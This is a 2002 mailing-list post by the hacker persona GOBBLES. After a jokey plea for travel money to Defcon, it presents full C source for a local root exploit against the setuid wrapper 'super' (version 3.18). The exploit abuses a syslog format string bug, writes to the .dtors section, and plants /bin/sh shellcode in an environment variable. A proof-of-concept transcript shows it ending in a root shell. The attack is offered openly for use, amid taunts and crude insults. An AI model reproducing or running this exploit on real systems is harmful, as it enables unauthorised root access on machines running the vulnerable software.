-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 /* * SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES * * When GOBBLES say he and he security team * are non-profit. He really mean NON-profit. * This means GOBBLES and he GOBBLES Security * Labs (GSL) friends do not have much funds. * * GOBBLES was hoping to receive the money * for speaking at the defcon gathering of * security enthusiasts up front. So he could buy * and pay for he ticket to Las Vegas from the great city * of Baltimore where he currently resides. * * GOBBLES is not selling out. GOBBLES is just admitting that he * need your help. Please, help GOBBLES! * * After many e-mails to defcon organisers it became * apparent to GOBBLES this was not going to happen. * This mean GOBBLES has no way of getting to defcon. * This also mean GOBBLES cannot deliver he talk that * are named "Wolves among us". Alot of time and work * went into the preperation of this talk and it was * to be the grand finale of the year of the turkey * (2002). With many new 0-day to give out and many * great anouncements to be made. * * Thanks to Jeff Moss (dtat_private, jmossat_private) * you, the defcon attendee, may very well get cheated out * of attending one of the most provocative and daring * events defcon history has ever seen. * * !!! ITS NOT TOO LATE..BUT HURRY !!! * * Help GOBBLES go to defcon. GOBBLES give so much to * the community..is it not time the community now help * a poverty stricken turkey to spread his wings and fly * towards fame and glory? * * Reasons why you should help GOBBLES get to defcon: * * -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper * * -- Seeing GOBBLES present naked: Priceless. * * -- Zeroday (possible hardcover) GOBBLES comic * * -- A chance to buy GOBBLES art * * -- A chance to receive _free_ GOBBLES T-shirts * * -- Copies of those exploits you couldn't code * * * What does GOBBLES need? * * Basically GOBBLES need to round up 300 US dollars before saturday. * "Wolves among us" is sheduled for the last day of defcon. * Namely 3PM on Sunday August 4th. As you can very well imagine * this talk was going to blow the lid off of more dirty secrets * than there are noodles in China. With your help GOBBLES can still * make this happen. So what GOBBLES is asking for is a little helping * hand from the community. If anyone has the funds to sponsor GOBBLES * to come to defcon please contact GOBBBLES at GOBBLESat_private * * !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!! * * GOBBLES accepts Western Union payments. GOBBLES will not accept anything * beyond the amount needed for travel to Vegas and back. GOBBLES is not * selling out, GOBBLES is asking help from those penetrators and researchers * that GOBBLES helps every day. * * In other news, ISS rejected GOBBLES request for a job application. It * seems that they're afraid of getting scalp'd. * * Political statement: * HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE * PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!! * * FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN * JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00 * FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM */ /* * GOBBLES-own-super.c * -- root exploit for root hole in root wrapper * * Super is sudo wannabe that boasts much security. * GOBBLES think people who write setuid wrappers * should learn to program securely before opening * big hoohoo about how secure program is. * * Current super version (3.18): -- ftp://ftp.ucolick.org/pub/users/will/ * * Super maintainer say following about he code: * * "Super allows an admin to control access to files * and functions for users. It is similar to sudo, but * uses a different approach in the configuration file." * * Problem: * * When super is compiled to use syslog(3) for its logging * of error messages the following lines makes pre-auth * local root exploitation rather trivial: * * From error.c * ... * #define SysLog(pri, buf) syslog((pri), (buf)) * ... * SysLog(error_priority, buf); * ... * * This means users that are not in the super config file * will be able to execute code with root priviledges. * * "Super acts as a SetUID wrapper around system commands * to make sure the commands are executed safely, and * only by authorized users." * * hehehe ;PPpPPPPp * * Love, * GOBBLES * GOBBLESat_private * * Official site: http://www.bugtraq.org * Official mirror: http://www.immunitysec.com/GOBBLES/ */ /* Proof Of Concept: $ gcc GOBBLES-own-super.c -o GOBBLES-own-super $ ./GOBBLES-own-super Usage: ./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ] $ objdump -s -j .dtors /usr/local/bin/super /usr/local/bin/super: file format elf32-i386 Contents of section .dtors: 8063f7c ffffffff 00000000 ........ $ ./GOBBLES-own-super -t 0x8063f7c . target @ 0x8063f80 . shellcode @ 0xbfffffb0 . username: 9 bytes super: No such super command as `xx??%.49103x%29$hn%.16305x%30$hn'. sh-2.05# */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <pwd.h> #include <sys/types.h> #define ALLIGN 2 #define DPA 29 #define SUPER "/usr/local/bin/super" void buildstring(unsigned long t, unsigned long w, int dpa, int allign); void stuff(void); extern char **environ; char string[256]; int main(int argc, char **argv) { unsigned long t, w; int dpa, allign, shift = 0; char c, *store; if(argc == 1) { fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", argv[0]); exit(0); } allign = ALLIGN; dpa = DPA; while((c = getopt(argc, argv, "t:o:A:")) != EOF) { switch(c) { case 't': sscanf(optarg, "%p", &store); t = (long)store; t += 4; break; case 'o': dpa = atoi(optarg); break; case 'A': allign = atoi(optarg); break; default: fprintf(stderr, "hehehe ;PPppPPPp\n"); exit(0); } } store = NULL; if((store = getenv("GOBBLES")) == NULL) { stuff(); if(execve(argv[0], argv, environ)) { fprintf(stderr, ". problem re-executing\n"); exit(1); } } w = (long)store; // shift is signed so this works both ways shift = (strlen(argv[0]) - strlen(SUPER)); w += shift; fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w); buildstring(t, w, dpa, allign); if(execl(SUPER, "super", string, NULL)) { fprintf(stderr, "error executing\n"); exit(1); } } void buildstring(unsigned long t, unsigned long w, int dpa, int allign) { unsigned int un, deux, x, b[4], namelen; char a_buf[4]; struct passwd *pass; memset(string, '\0', sizeof(string)); memset(a_buf, '\0', sizeof(a_buf)); if((pass = getpwuid(getuid())) == NULL) { fprintf(stderr, ". can't find your username\n"); exit(1); } namelen = strlen(pass->pw_name); fprintf(stderr, ". username: %d bytes\n", namelen); for(x = 0; x < allign && x < sizeof(a_buf); x++) a_buf[x] = 'x'; b[0] = (t & 0x000000ff); b[1] = (t & 0x0000ff00) >> 8; b[2] = (t & 0x00ff0000) >> 16; b[3] = (t & 0xff000000) >> 24; un = (w >> 16) & 0xffff; deux = w & 0xffff; if(un < deux) { snprintf(string, sizeof(string)-1, "%s" "%c%c%c%c%c%c%c%c" "%%.%hdx" "%%%d$hn" "%%.%hdx" "%%%d$hn", a_buf, b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3], un - (8 + allign + 29 + namelen), dpa, deux - un, dpa + 1 ); } else { snprintf(string, sizeof(string)-1, "%s" "%c%c%c%c%c%c%c%c" "%%.%hdx" "%%%d$hn" "%%.%hdx" "%%%d$hn", a_buf, b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3], deux - (8 + allign + 29 + namelen), dpa, un-deux, dpa + 1 ); } } void stuff(void) { char code[] = // the setuid 0 with the execve of the /bin/sh "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31" "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d" "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; setenv("GOBBLES", code, 1); } -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ== =xfu0 -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Wed Jul 31 2002 - 07:45:05 PDT